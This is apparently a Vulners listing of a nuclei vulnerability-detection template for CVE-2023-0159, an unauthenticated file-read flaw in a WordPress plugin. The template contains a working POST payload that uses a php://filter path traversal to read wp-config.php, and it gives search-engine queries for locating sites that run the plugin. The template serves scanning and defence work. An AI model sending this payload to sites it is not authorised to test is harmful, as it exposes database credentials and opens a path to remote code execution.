Lucene search
K

Extensive VC Addons for WPBakery page builder < 1.9.1 - Unauthenticated RCE

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 115 Views

Extensive VC Addons for WPBakery page builder < 1.9.1 - Unauthenticated RCE allows unauthenticated attackers to read arbitrary files from the host's file system and escalate to RCE using PHP filter chains. Fixed in version 1.9.1

Related
Refs
Code
id: CVE-2023-0159

info:
  name: Extensive VC Addons for WPBakery page builder < 1.9.1 - Unauthenticated RCE
  author: c4sper0
  severity: high
  description: |
    The plugin does not validate a parameter passed to the php extract function when loading templates, allowing an unauthenticated attacker to override the template path to read arbitrary files from the hosts file system. This may be escalated to RCE using PHP filter chains.
  impact: |
    Unauthenticated attackers can exploit parameter validation flaws in the template loading mechanism to read arbitrary files including wp-config.php and escalate to remote code execution using PHP filter chains.
  remediation: Fixed in 1.9.1
  reference:
    - https://wpscan.com/vulnerability/239ea870-66e5-4754-952e-74d4dd60b809/
    - https://github.com/im-hanzou/EVCer
    - https://github.com/nomi-sec/PoC-in-GitHub
    - https://github.com/xu-xiang/awesome-security-vul-llm
    - https://wordpress.org/plugins/extensive-vc-addon/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-0159
    epss-score: 0.55736
    epss-percentile: 0.98919
    cpe: cpe:2.3:a:wprealize:extensive_vc_addons_for_wpbakery_page_builder:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: wprealize
    product: "extensive_vc_addons_for_wpbakery_page_builder"
    framework: wordpress
    shodan-query: "http.html:/wp-content/plugins/extensive-vc-addon/"
    fofa-query: "body=/wp-content/plugins/extensive-vc-addon/"
    publicwww-query: "/wp-content/plugins/extensive-vc-addon/"
  tags: cve,cve2023,wordpress,wpbakery,wp-plugin,lfi,extensive-vc-addon,wprealize,vkev,vuln

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=extensive_vc_init_shortcode_pagination&options[template]=php://filter/convert.base64-encode/resource=../wp-config.php

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{"status":"success","message":"Items are loaded","data":'

      - type: status
        status:
          - 200
# digest: 4b0a004830460221008f0bb61bd55218a11d13817c6710de8d3e547bf9116030795436143a230810a2022100bb823b8eb61b5a56ea46fc2730ed53a45ec05ba44673b4278ea034549ec7dbcc:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 3.17.5
EPSS0.55736
115